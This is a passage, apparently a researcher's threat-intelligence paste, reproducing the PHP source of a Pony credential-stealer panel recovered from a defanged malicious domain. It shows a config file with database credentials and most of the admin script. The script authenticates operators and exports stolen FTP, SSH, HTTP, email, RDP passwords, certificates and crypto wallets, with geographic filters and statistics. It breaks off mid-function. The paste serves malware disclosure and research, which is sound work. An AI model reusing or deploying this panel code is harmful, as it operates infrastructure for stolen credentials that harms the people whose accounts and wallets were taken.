2018-06-06 #pony panel php contents alhaini-kw[.]ltd

1. found by @neonprimetime security
2. #pony panel zip file contents
3.  
4. hxxp://alhaini-kw[.]ltd/quzhou/coreserver.zip
5.  
6. -----------
7.  
8. <?php
9.  
10. // mysql settings
11. $mysql_host = '127.0.0.1';
12. $mysql_user = 'alhainik_av';
13. $mysql_pass = 'working360#';
14. $mysql_database = 'alhainik_av';
15.  
16. $global_directory_slash = DIRECTORY_SEPARATOR;
17. $global_temporary_directory = 'temp';
18.  
19. // debug settings
20. $global_verbose_log = false; // improved verbose log, use for debugging only!
21. $global_allow_all_ftp = false; // disable filtering, set 'true' for testing purposes only!
22.  
23. $global_filter_list = array(
24. '127.0.0.1',
25. '192.168.',
26. 'localhost',
27. 'nonymous',
28. 'bitshare.com',
29. 'depositfiles.com',
30. 'filesonic.com',
31. 'gigapeta.com',
32. 'hotfile.com',
33. 'ifolder.ru',
34. 'letitbit.net',
35. 'sms4file.com',
36. 'turbobit.ru',
37. 'uploadbox.com',
38. 'vip-file.com',
39. 'wupload.com',
40. );
41.  
42. // accept connections from white-list IPs only
43. $white_list = array(
44. // add at least one IP to enable white-list mode
45. //"127.0.0.1",
46. );
47.  
48. date_default_timezone_set('Europe/Moscow');
49. $enable_http_mode = true; // collect HTTP(s) passwords
50. $show_help_to_users = true; // hide help for non admin accounts
51. $show_http_to_users = true; // hide HTTP password page for non admin accounts
52. $show_logons_to_users = true; // do not show IP logger for non admin accounts
53. $disable_ip_logger = false; // disable IP logger
54. $enable_email_mode = true; // collect E-mail passwords
55. $show_email_to_users = true; // hide E-mail password page for non admin accounts
56. $show_other_to_users = true; // hide Other password page for non admin accounts
57. $use_mysql_persist_connections = false; // use mysql persist connections
58. $show_domains = true; // hide ping domains page & functions
59. $show_domains_to_users = true; // hide ping domains page for non admin accounts
60.  
61.  
62.  
63. -----------
64. <?php
65.  
66. // show all errors
67. error_reporting(E_ALL & ~E_DEPRECATED);
68. @set_time_limit(0);
69. @ini_set('max_execution_time', 0);
70. session_set_cookie_params(86400);
71. session_start();
72.  
73. // make sure included files do not generate extra output
74. ob_start();
75.  
76. if (!isset($proxy_config))
77. {
78. // use local config file
79. $config_file = "config.php";
80. } else
81. {
82. // use proxy config file
83. $config_file = $proxy_config;
84. }
85.  
86. file_exists($config_file) or die();
87.  
88. require_once($config_file);
89. require_once("includes/lang.php");
90. require_once("includes/misc.php");
91. require_once("includes/password_modules.php");
92. require_once("includes/database.php");
93.  
94. // clean output buffer
95. ob_end_clean();
96.  
97. // white list processing code
98. if (isset($white_list) && is_array($white_list))
99. {
100. if (count($white_list) && array_search(get_client_ip(), $white_list, true) === false)
101. {
102. header("HTTP/1.0 404 Not Found");
103. header("Status: 404 Not Found");
104. $_SERVER['REDIRECT_STATUS'] = 404;
105. if (file_exists('404.html'))
106. echo file_get_contents('404.html');
107. die();
108. }
109. }
110.  
111. // connect and validate database
112. $pony_db = new pony_db();
113. $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, true);
114.  
115. // set cookie name
116. // cookie should be different for each script
117. $config_cookie_name = 'auth_cookie';
118. if (isset($proxy_id))
119. {
120. $config_cookie_name = 'auth_cookie_'.$proxy_id;
121. }
122.  
123. // set report decryption password
124. $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
125. // set report parsing options
126. $pony_report_options = array('sftp_user' => $pony_db->get_option('sftp_user', '', '1'),
127. 'sftp_port' => $pony_db->get_option('sftp_port', '', '1'),
128. 'sftp_protocol' => $pony_db->get_option('sftp_protocol', '', '1'));
129.  
130. // default values for unset config variables
131. if (!isset($show_help_to_users))
132. $show_help_to_users = true;
133. if (!isset($show_http_to_users))
134. $show_http_to_users = true;
135. if (!isset($show_logons_to_users))
136. $show_logons_to_users = true;
137. if (!isset($show_other_to_users))
138. $show_other_to_users = true;
139. if (!isset($enable_http_mode))
140. $enable_http_mode = false;
141. if (!isset($disable_ip_logger))
142. $disable_ip_logger = false;
143. if (!isset($enable_email_mode))
144. $enable_email_mode = false;
145. if (!isset($show_email_to_users))
146. $show_email_to_users = true;
147. if (!isset($show_domains))
148. $show_domains = false;
149. if (!isset($show_domains_to_users))
150. $show_domains_to_users = true;
151.  
152. // initialize CSRF token
153. if (!isset($_SESSION['token']))
154. {
155. $token = md5(uniqid(rand(), TRUE));
156. $_SESSION['token'] = $token;
157. }
158. else
159. {
160. $token = $_SESSION['token'];
161. }
162.  
163. // initialize smarty
164. define('SMARTY_DIR', str_replace("\\", "/", getcwd()).'/includes/Smarty-3.1.15/libs/');
165. require_once(SMARTY_DIR . 'Smarty.class.php');
166. require_once(SMARTY_DIR . 'SmartyPaginate.class.php');
167. function escFilter($content)
168. {
169. return htmlspecialchars($content, ENT_QUOTES, 'cp1251');
170. }
171. $smarty = new Smarty();
172. $smarty->setCacheDir($global_temporary_directory.'/');
173. $smarty->setCompileDir($global_temporary_directory.'/');
174. $smarty->setTemplateDir('includes/templates/');
175. $smarty->registerFilter('variable', 'escFilter');
176. $smarty->loadFilter('output', 'trimwhitespace');
177. $smarty->caching = false;
178. $smarty->assign('show_help_to_users', $show_help_to_users);
179. $smarty->assign('show_http_to_users', $show_http_to_users);
180. $smarty->assign('show_logons_to_users', $show_logons_to_users);
181. $smarty->assign('show_other_to_users', $show_other_to_users);
182. $smarty->assign('enable_http_mode', $enable_http_mode);
183. $smarty->assign('disable_ip_logger', $disable_ip_logger);
184. $smarty->assign('enable_email_mode', $enable_email_mode);
185. $smarty->assign('show_email_to_users', $show_email_to_users);
186. $smarty->assign('show_domains', $show_domains);
187. $smarty->assign('show_domains_to_users', $show_domains_to_users);
188. $smarty->assign('token', $token);
189.  
190. // initialize common used variables
191. $self_file = $_SERVER['SCRIPT_NAME'];
192. $authentication_login = trim(assign($_REQUEST['login']));
193. $authentication_password = trim(assign($_REQUEST['password']));
194. $authentication_success = false;
195. $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
196. $authentication_save_password = trim(assign($_REQUEST['save_password']));
197. $admin_action = trim(assign($_REQUEST['action']));
198. $auth_cookie = trim(assign($_COOKIE[$config_cookie_name]));
199. $admin_routine = trim(assign($_REQUEST['routine']));
200. $use_zip = trim(assign($_REQUEST['zip'])) == '1';
201.  
202. // filter available action pages
203. if (array_search($admin_action, array('ftp', 'http', 'stats', 'ping', 'log', 'admin', 'exit', 'help', 'chart', 'reports', 'other')) === false)
204. {
205. $admin_action = '';
206. }
207.  
208. // authentication
209. if (!$authentication_attempt)
210. {
211. $authentication_login = trim(assign($_REQUEST['login']));
212. $authentication_password = trim(assign($_REQUEST['password']));
213. $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
214. }
215.  
216. // try to authenticate
217. if (strlen($authentication_login) && strlen($authentication_password) && $pony_db->authenticate($authentication_login, $authentication_password))
218. {
219. $authentication_success = true;
220.  
221. // set cookie on successful authentication
222. $cookie_save_password = $authentication_save_password;
223. if ($cookie_save_password)
224. $cookie_exp_time = time()+60*60*24*60; // 2 months
225. else
226. $cookie_exp_time = 0;
227.  
228. setcookie($config_cookie_name, $pony_db->auth_cookie, $cookie_exp_time);
229. } else
230. {
231. // authentication failed
232. // try to authenticate using cookie
233. if ($auth_cookie)
234. {
235. $authentication_success = $pony_db->autneticate_cookie($auth_cookie);
236. if ($authentication_success)
237. $authentication_login = $pony_db->login;
238. }
239. }
240.  
241. // ajax ping code
242. // should be displayed before authorization form
243. if ($admin_routine == 'ping' && $admin_action == 'ping' && $authentication_success && $token === assign($_REQUEST['token']) && ($show_domains && ($pony_db->priv_is_admin() || $show_domains_to_users)))
244. {
245. $domain_id = trim(assign($_REQUEST['domain_id']));
246. $find_domain_result = $pony_db->find_domain($domain_id);
247.  
248. if (is_array($find_domain_result) && $find_domain_result && count($find_domain_result) == 3)
249. {
250. list($ping_url, $ping_time, $ping_status) = $find_domain_result;
251.  
252. if (curl_ping($ping_url))
253. {
254. $pony_db->update_domain($domain_id, 'OK');
255. die("<span class=\"check\"></span>");
256. }
257. }
258. $pony_db->update_domain($domain_id, 'FAIL');
259. die("<span class=\"cross\"></span>");
260. }
261.  
262. if ($admin_action == 'chart' && strlen($admin_routine) && $authentication_success && $token === assign($_REQUEST['token']))
263. {
264. require_once('includes/chart.php');
265. die();
266. }
267.  
268. // these variables available can be set after authentication only
269. $smarty->assign('priv_is_admin', $pony_db->priv_is_admin());
270. $smarty->assign('priv_can_delete', $pony_db->priv_can_delete());
271. $smarty->assign('authentication_success', $authentication_success);
272.  
273. function smarty_assign_continents($smarty)
274. {
275. $smarty_geo_continents = array();
276. $geo_ip = new GeoIP();
277. $k = 0;
278. for ($i = 0; $i < count($geo_ip->GEOIP_CONTINENT_CODES); $i++)
279. {
280. if (strlen($geo_ip->GEOIP_COUNTRY_NAMES[$i]))
281. {
282. if (!isset($smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]]))
283. {
284. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k]['name'] = '(all)';
285. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k++]['code'] = 'all';
286. }
287. {
288. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k]['name'] = $geo_ip->GEOIP_COUNTRY_NAMES[$i];
289. $smarty_geo_continents[$geo_ip->GEOIP_CONTINENT_CODES[$i]][$k++]['code'] = $geo_ip->GEOIP_COUNTRY_CODES[$i];
290. }
291. }
292. }
293.  
294. $smarty->assign('geo_continents', $smarty_geo_continents);
295. }
296.  
297. function apply_data_filters($smarty, $do_download, $mode = 'ftp')
298. {
299. global $pony_db;
300.  
301. $filter_include_ftp = trim(assign($_REQUEST['filter_include_ftp']));
302. $filter_include_ssh = trim(assign($_REQUEST['filter_include_ssh']));
303.  
304. $filter_include_http = trim(assign($_REQUEST['filter_include_http']));
305. $filter_include_https = trim(assign($_REQUEST['filter_include_https']));
306.  
307. $filter_trim_dirs = trim(assign($_REQUEST['filter_trim_dirs']));
308. if ($filter_trim_dirs != '1')
309. $filter_trim_dirs = '';
310.  
311. if ($mode == 'ftp')
312. {
313. // include ftp/ssh
314. if ($filter_include_ftp == '1' && $filter_include_ssh == '1')
315. $include_subtypes = 'both';
316. else if ($filter_include_ssh)
317. $include_subtypes = 'ssh';
318. else
319. $include_subtypes = 'ftp';
320. } else
321. {
322. // include http/https
323. if ($filter_include_http == '1' && $filter_include_https == '1')
324. $include_subtypes = 'both';
325. else if ($filter_include_http)
326. $include_subtypes = 'http';
327. else
328. $include_subtypes = 'https';
329. }
330.  
331. // include domains
332. $include_domains = trim(assign($_REQUEST['filter_domains_include']));
333.  
334. // exclude domains
335. $exclude_domains = trim(assign($_REQUEST['filter_domains_exclude']));
336.  
337. // text substring
338. $filter_text = trim(assign($_REQUEST['filter_text']));
339.  
340. // date filter
341. $filter_date_from = trim(assign($_REQUEST['filter_date_from']));
342. $filter_date_to = trim(assign($_REQUEST['filter_date_to']));
343.  
344. // export ip setting
345. $filter_export_ip = trim(assign($_REQUEST['filter_export_ip']));
346. if ($filter_export_ip != '1')
347. $filter_export_ip = '';
348.  
349. // country filter
350. $filter_country = array();
351. $geo_ip = new GeoIP();
352.  
353. foreach ($geo_ip->GEOIP_CONTINENT_CODES as $continent_code)
354. {
355. if (isset($_REQUEST['country_'.strtolower($continent_code)]) && is_array($_REQUEST['country_'.strtolower($continent_code)]))
356. {
357. foreach ($_REQUEST['country_'.strtolower($continent_code)] as $country_code)
358. {
359. if (strlen(trim($country_code)) && $country_code != 'all')
360. {
361. $filter_country[trim($country_code)] = 1;
362. }
363. }
364. }
365. }
366.  
367. // when all countries are marked, do not apply country exclude filter
368. if (count($filter_country) == count($geo_ip->GEOIP_COUNTRY_CODES)-1)
369. {
370. $filter_country = array();
371. }
372.  
373. $ftp_list = array();
374. if (strlen($filter_include_ftp) || strlen($filter_include_ssh) || strlen($filter_trim_dirs) || strlen($filter_include_http) || strlen($filter_include_https) || count($filter_country) || strlen($include_domains) || strlen($exclude_domains) || strlen($filter_date_from) || strlen($filter_date_to) ||
375. strlen($filter_text) || strlen($filter_export_ip))
376. {
377. if ($mode == 'ftp')
378. {
379. $filtered_items = $pony_db->get_ftp_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
380. }
381. else
382. {
383. $filtered_items = $pony_db->get_http_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
384. }
385.  
386. // filter preview
387. if ($filtered_items !== false && isset($filtered_items['list']) && isset($filtered_items['count']))
388. {
389. if (is_array($filtered_items['list']))
390. {
391. foreach ($filtered_items['list'] as $ftp_item=>$ftp_value)
392. {
393. if (!$pony_db->report_id_exists($filtered_items['list'][$ftp_item]['report_id']))
394. {
395. $filtered_items['list'][$ftp_item]['report_id'] = '';
396. }
397. }
398. }
399.  
400. $smarty->assign('filtered_items_count', $filtered_items['count']);
401. $smarty->assign('filtered_items_list', $filtered_items['list']);
402. }
403. }
404. }
405.  
406. if ($authentication_success)
407. {
408. // successfull authentication
409.  
410. // log it
411. if ($authentication_attempt)
412. {
413. if (!$disable_ip_logger)
414. {
415. $pony_db->add_log_line(get_client_ip(), CLOG_SOURCE_LOGIN, null, $authentication_login);
416. }
417. }
418. } else if (!$authentication_attempt)
419. {
420. // didn't try to authenticate the user
421. // show authentication form
422. $smarty->display('header.tpl');
423. $smarty->display('login_form.tpl');
424. $smarty->display('footer.tpl');
425. die();
426. } else
427. {
428. // tried to authenticate the user, but failed
429. // show error message
430. $smarty->display('header.tpl');
431. show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '');
432. $smarty->display('footer.tpl');
433. }
434.  
435. if ($admin_action == '' && $admin_routine == '' && $authentication_success)
436. {
437. // workaround for saved password autologin
438. } else if ($admin_action == 'exit' || $token !== assign($_REQUEST['token']))
439. {
440. $cookie_exp_time = 1;
441. $pony_db->remove_auth_cookie($auth_cookie);
442. setcookie($config_cookie_name, '', $cookie_exp_time);
443.  
444. // destroy session
445. $_SESSION = array();
446.  
447. if (ini_get("session.use_cookies")) {
448. $params = session_get_cookie_params();
449. setcookie(session_name(), '', time() - 42000,
450. $params["path"], $params["domain"],
451. $params["secure"], $params["httponly"]
452. );
453. }
454.  
455. // redirect to authentication page
456. header('Location: '.$self_file);
457.  
458. session_destroy();
459. die();
460. }
461.  
462. if (!$authentication_success)
463. {
464. // authentication failed, stop script execution
465. die();
466. }
467.  
468. function set_common_file_download_header($file_name = '', $content_type = 'text/plain')
469. {
470. header("Pragma: public");
471. header("Expires: 0");
472. header("Pragma: no-cache");
473. header("Cache-Control: no-store, no-cache, must-revalidate");
474. header("Cache-Control: post-check=0, pre-check=0", false);
475. header("Cache-Control: private", false);
476. header("Content-Type: $content_type");
477. header("Content-Transfer-Encoding: binary");
478. header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
479. header('Content-Disposition: attachment; filename="'.$file_name.'";');
480. }
481.  
482. if ($admin_routine == 'download_ftp' && $admin_action == 'ftp')
483. {
484. if ($use_zip)
485. {
486. set_common_file_download_header('ftp_list.zip', 'application/zip');
487. ob_start();
488. $pony_db->get_ftp_list(true);
489. $ftp_list_data = ob_get_contents();
490. ob_end_clean();
491. create_zip_and_send('ftp_list.txt', $ftp_list_data);
492. } else
493. {
494. set_common_file_download_header('ftp_list.txt');
495. $pony_db->get_ftp_list(true);
496. }
497. die();
498. }
499. if ($admin_routine == 'download_ssh' && $admin_action == 'ftp')
500. {
501. if ($use_zip)
502. {
503. set_common_file_download_header('ssh_list.zip', 'application/zip');
504. ob_start();
505. $null_array = array();
506. $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
507. $ssh_list_data = ob_get_contents();
508. ob_end_clean();
509. create_zip_and_send('ssh_list.txt', $ssh_list_data);
510. } else
511. {
512. set_common_file_download_header('ssh_list.txt');
513. $null_array = array();
514. $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
515. }
516. die();
517. }
518. if ($admin_routine == 'download_http' && $admin_action == 'http' && $enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
519. {
520. if ($use_zip)
521. {
522. set_common_file_download_header('http_list.zip', 'application/zip');
523. ob_start();
524. $pony_db->get_http_list(true);
525. $http_list_data = ob_get_contents();
526. ob_end_clean();
527. create_zip_and_send('http_list.txt', $http_list_data);
528. } else
529. {
530. set_common_file_download_header('http_list.txt');
531. $pony_db->get_http_list(true);
532. }
533. die();
534. }
535. if ($admin_routine == 'download_email' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
536. {
537. if ($use_zip)
538. {
539. set_common_file_download_header('email_list.zip', 'application/zip');
540. ob_start();
541. $pony_db->get_email_list(true);
542. $email_list_data = ob_get_contents();
543. ob_end_clean();
544. create_zip_and_send('email_list.txt', $email_list_data);
545. } else
546. {
547. set_common_file_download_header('email_list.txt');
548. $pony_db->get_email_list(true);
549. }
550. die();
551. }
552. if ($admin_routine == 'download_email_smtp' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
553. {
554. if ($use_zip)
555. {
556. set_common_file_download_header('email_smtp_list.zip', 'application/zip');
557. ob_start();
558. $null_list = array();
559. $pony_db->get_email_list(true, $null_list, 0, 'smtp');
560. $email_list_data = ob_get_contents();
561. ob_end_clean();
562. create_zip_and_send('email_smtp_list.txt', $email_list_data);
563. } else
564. {
565. set_common_file_download_header('email_smtp_list.txt');
566. $pony_db->get_email_list(true, $null_list, 0, 'smtp');
567. }
568. die();
569. }
570. if ($admin_routine == 'download_rdp')
571. {
572. if ($use_zip)
573. {
574. set_common_file_download_header('rdp_list.zip', 'application/zip');
575. ob_start();
576. $pony_db->get_rdp_list(true);
577. $rdp_list_data = ob_get_contents();
578. ob_end_clean();
579. create_zip_and_send('rdp_list.txt', $rdp_list_data);
580. } else
581. {
582. set_common_file_download_header('rdp_list.txt');
583. $pony_db->get_rdp_list(true);
584. }
585. die();
586. }
587. if ($admin_routine == 'download_reports' && $admin_action == 'ftp')
588. {
589. set_common_file_download_header('reports.sql');
590. $pony_db->export_reports(false);
591. die();
592. }
593.  
594. if ($admin_routine == 'download_nonparsed_reports' && $admin_action == 'ftp')
595. {
596. set_common_file_download_header('non_parsed_reports.sql');
597. $pony_db->export_reports(true);
598. die();
599. }
600.  
601. if ($admin_routine == 'download_log' && $admin_action == 'log')
602. {
603. if ($use_zip)
604. {
605. set_common_file_download_header('log.zip', 'application/zip');
606. ob_start();
607. $null_list = array();
608. $pony_db->get_log_list($null_list, 0, 0, true);
609. $log_list_data = ob_get_contents();
610. ob_end_clean();
611. create_zip_and_send('log.txt', $log_list_data);
612. } else
613. {
614. set_common_file_download_header('log.txt');
615. $null_list = array();
616. $pony_db->get_log_list($null_list, 0, 0, true);
617. }
618. die();
619. }
620.  
621. if ($admin_routine == 'download_report' && $admin_action == 'reports')
622. {
623. $report_id = trim(assign($_REQUEST['report_id']));
624. $report_item_result = $pony_db->get_report_item($report_id);
625. if ($pony_db->state && is_array($report_item_result))
626. {
627. set_common_file_download_header('report_'.strval(intval($report_id)).'.bin', 'application/octet-stream');
628. header("Content-Length: ".strlen($report_item_result['data']));
629. echo $report_item_result['data'];
630. } else
631. die('Report not found!');
632. die();
633. }
634. if ($admin_routine == 'filter_download' && $admin_action == 'ftp')
635. {
636. if ($use_zip)
637. {
638. set_common_file_download_header('filtered_list.zip', 'application/zip');
639. ob_start();
640. apply_data_filters($smarty, true);
641. $filter_list_data = ob_get_contents();
642. ob_end_clean();
643. create_zip_and_send('filtered_list.txt', $filter_list_data);
644. } else
645. {
646. set_common_file_download_header('filtered_list.txt');
647. apply_data_filters($smarty, true);
648. }
649. die();
650. }
651. if ($admin_routine == 'filter_download' && $admin_action == 'http')
652. {
653. if ($use_zip)
654. {
655. set_common_file_download_header('filtered_http_list.zip', 'application/zip');
656. ob_start();
657. apply_data_filters($smarty, true, 'http');
658. $filter_list_data = ob_get_contents();
659. ob_end_clean();
660. create_zip_and_send('filtered_http_list.txt', $filter_list_data);
661. } else
662. {
663. set_common_file_download_header('filtered_http_list.txt');
664. apply_data_filters($smarty, true, 'http');
665. }
666. die();
667. }
668. if ($admin_routine == 'download_cert' && $admin_action == 'other')
669. {
670. set_common_file_download_header('certificates.zip', 'application/zip');
671.  
672. $pony_db->get_cert_zip();
673.  
674. die();
675. }
676. if ($admin_routine == 'download_wallet' && $admin_action == 'other')
677. {
678. set_common_file_download_header('wallets.zip', 'application/zip');
679.  
680. $pony_db->get_wallet_zip();
681.  
682. die();
683. }
684.  
685.  
686. $smarty->display('header.tpl');
687.  
688. my_flush();
689.  
690. function clear_floating_offsets($pony_db)
691. {
692. $offsets = array('offset_url', 'offset_ftp_last', 'offset_http_last', 'offset_reports_last',
693. 'offset_ftp_list', 'offset_http_list', 'data_sum', 'offset_nonparsed_reports_stats',
694. 'offset_nonparsed_reports_sum', 'offset_log_events_count', 'offset_report_duplicates',
695. 'offset_email_list');
696. foreach ($offsets as $offset_to_clear)
697. {
698. $pony_db->set_multi_option($offset_to_clear, array(''));
699. }
700. }
701.  
702. function smarty_assign_common_vars($smarty, $pony_db)
703. {
704. $pony_db->lock_all_tables();
705. $offset_url = $pony_db->get_multi_option('offset_url', 6);
706.  
707. $url_password_stats = array();
708. $pony_db->get_url_password_stats($url_password_stats, $offset_url[0]);
709. if (!isset($url_password_stats['ftp']))
710. $url_password_stats['ftp'] = '0';
711. if (!isset($url_password_stats['ssh']))
712. $url_password_stats['ssh'] = '0';
713. if (!isset($url_password_stats['http']))
714. $url_password_stats['http'] = '0';
715. if (!isset($url_password_stats['https']))
716. $url_password_stats['https'] = '0';
717. if (!isset($url_password_stats['rdp']))
718. $url_password_stats['rdp'] = '0';
719.  
720. $url_password_stats['ftp'] += $offset_url[1];
721. $url_password_stats['ssh'] += $offset_url[2];
722. $url_password_stats['http'] += $offset_url[3];
723. $url_password_stats['https'] += $offset_url[4];
724. $url_password_stats['rdp'] += $offset_url[5];
725.  
726. $pony_db->set_multi_option('offset_url',
727. array(
728. $pony_db->get_auto_value(CPONY_FTP_TABLE),
729. $url_password_stats['ftp'],
730. $url_password_stats['ssh'],
731. $url_password_stats['http'],
732. $url_password_stats['https'],
733. $url_password_stats['rdp']
734. )
735. );
736.  
737. $smarty->assign('total_ftp_items_count', $url_password_stats['ftp']);
738. $smarty->assign('total_http_items_count', strval(intval($url_password_stats['http']) + intval($url_password_stats['https'])));
739. $smarty->assign('total_cert_items_count', $pony_db->get_table_row_count(CPONY_CERT_TABLE));
740. $smarty->assign('total_wallet_items_count', $pony_db->get_table_row_count(CPONY_WALLET_TABLE));
741. $smarty->assign('total_email_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE));
742. $smarty->assign('total_email_smtp_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE, "WHERE protocol='smtp'"));
743. $smarty->assign('total_ssh_items_count', $url_password_stats['ssh']);
744. $smarty->assign('total_rdp_items_count', $url_password_stats['rdp']);
745. $smarty->assign('total_reports_count', $pony_db->get_table_row_count(CPONY_REPORT_TABLE));
746.  
747. $report_sum = $pony_db->get_multi_option('data_sum', 2);
748. $total_reports_size = $report_sum[1] + $pony_db->get_report_sum('', $report_sum[0]);
749.  
750. $pony_db->set_multi_option('data_sum',
751. array(
752. $pony_db->get_auto_value(CPONY_REPORT_DATA_TABLE),
753. $total_reports_size,
754. )
755. );
756.  
757. $smarty->assign('total_reports_size', $total_reports_size);
758.  
759. $offset_report_duplicates = $pony_db->get_multi_option('offset_report_duplicates', 2);
760. $report_duplicates = $offset_report_duplicates[1] + $pony_db->get_duplicate_report_count($offset_report_duplicates[0]);
761. $smarty->assign('report_duplicates', $report_duplicates);
762. $pony_db->set_multi_option('offset_report_duplicates',
763. array(
764. $pony_db->get_auto_value(CPONY_LOG_TABLE),
765. $report_duplicates,
766. )
767. );
768.  
769. $offset_nonparsed_reports = $pony_db->get_multi_option('offset_nonparsed_reports_stats', 2);
770. $total_nonparsed_reports = $offset_nonparsed_reports[1] + $pony_db->get_table_row_count(CPONY_REPORT_TABLE, "WHERE report_id>='".mysql_real_escape_string($offset_nonparsed_reports[0])."' AND parsed='0'");
771. $smarty->assign('total_nonparsed_reports', $total_nonparsed_reports);
772. $pony_db->set_multi_option('offset_nonparsed_reports_stats',
773. array(
774. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
775. $total_nonparsed_reports,
776. )
777. );
778.  
779. $offset_nonparsed_reports_sum = $pony_db->get_multi_option('offset_nonparsed_reports_sum', 2);
780. $total_nonparsed_reports_sum = $offset_nonparsed_reports_sum[1] + $pony_db->get_report_sum_linked("WHERE parsed='0'", $offset_nonparsed_reports_sum[0]);
781. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
782. $pony_db->set_multi_option('offset_nonparsed_reports_sum',
783. array(
784. $pony_db->get_auto_value(CPONY_REPORT_TABLE),
785. $total_nonparsed_reports_sum,
786. )
787. );
788.  
789. $smarty->assign('total_nonparsed_report_size', $total_nonparsed_reports_sum);
790. $smarty->assign('total_ftp_table_size', $pony_db->get_table_size(CPONY_FTP_TABLE));
791. $smarty->assign('total_report_table_size', $pony_db->get_table_size(CPONY_REPORT_TABLE) + $pony_db->get_table_size(CPONY_REPORT_DATA_TABLE));
792. $smarty->assign('total_log_table_size', $pony_db->get_table_size(CPONY_LOG_TABLE));
793. $smarty->assign('total_cert_table_size', $pony_db->get_table_size(CPONY_CERT_TABLE));
794. $smarty->assign('total_wallet_table_size', $pony_db->get_table_size(CPONY_WALLET_TABLE));
795. $smarty->assign('total_email_table_size', $pony_db->get_table_size(CPONY_EMAIL_TABLE));
796.  
797. $offset_log_events_count = $pony_db->get_multi_option('offset_log_events_count', 2);
798. $log_events_count = $offset_log_events_count[1] + $pony_db->get_table_row_count(CPONY_LOG_TABLE, "WHERE log_id>='".mysql_real_escape_string($offset_log_events_count[0])."' AND (log_source<>'".mysql_real_escape_string(CLOG_SOURCE_LOGIN)."')");
799. $smarty->assign('log_events_count', $log_events_count);
800. $pony_db->set_multi_option('offset_log_events_count',
801. array(
802. $pony_db->get_auto_value(CPONY_LOG_TABLE),
803. $log_events_count,
804. )
805. );
806.  
807. $smarty->assign('server_time', mysql_now_date());
808. $smarty->assign('db_size', $pony_db->get_db_size());
809.  
810. $offset_ftp = $pony_db->get_multi_option('offset_ftp_last', 3);
811. list($offset_ftp[0], $new_ftp_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[0]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
812. list($offset_ftp[1], $new_ftp_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[1]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
813. list($offset_ftp[2], $new_ftp_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_ftp[2]).'\' AND (url_type=\'ftp\' OR url_type=\'ssh\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
814. $smarty->assign('new_ftp_last_24_hours', $new_ftp_last_24_hours);
815. $smarty->assign('new_ftp_last_hour', $new_ftp_last_hour);
816. $smarty->assign('new_ftp_last_10_minutes', $new_ftp_last_10_minutes);
817.  
818. $pony_db->set_multi_option('offset_ftp_last',
819. array(
820. $offset_ftp[0],
821. $offset_ftp[1],
822. $offset_ftp[2],
823. )
824. );
825.  
826. $offset_http = $pony_db->get_multi_option('offset_http_last', 3);
827. list($offset_http[0], $new_http_last_24_hours) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[0]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 DAY)', 'ftp_id', CPONY_FTP_TABLE);
828. list($offset_http[1], $new_http_last_hour) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[1]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 1 HOUR)', 'ftp_id', CPONY_FTP_TABLE);
829. list($offset_http[2], $new_http_last_10_minutes) = $pony_db->get_offset_value_count('WHERE ftp_id>=\''.mysql_real_escape_string($offset_http[2]).'\' AND (url_type=\'http\' OR url_type=\'https\') AND import_time >= DATE_SUB(\''.mysql_real_escape_string(mysql_now_date()).'\',INTERVAL 10 MINUTE)', 'ftp_id', CPONY_FTP_TABLE);
830. $smarty->assign('new_http_last_24_hours', $new_http_last_24_hours);
831. $smarty->assign('new_http_last_hour', $new_http_last_hour);
832. $smarty->assign('new_http_last_10_minutes', $new_http_last_10_minutes);
833.  
834. $pony_db->set_multi_option('offset_http_last',
835. array(
836. $offset_http[0],
837. $offset_http[1],
838. $offset_http[2],
839. )
840. );
841.  
842. $offset_reports = $pony_db->get_multi_option('offset_reports_last', 3);
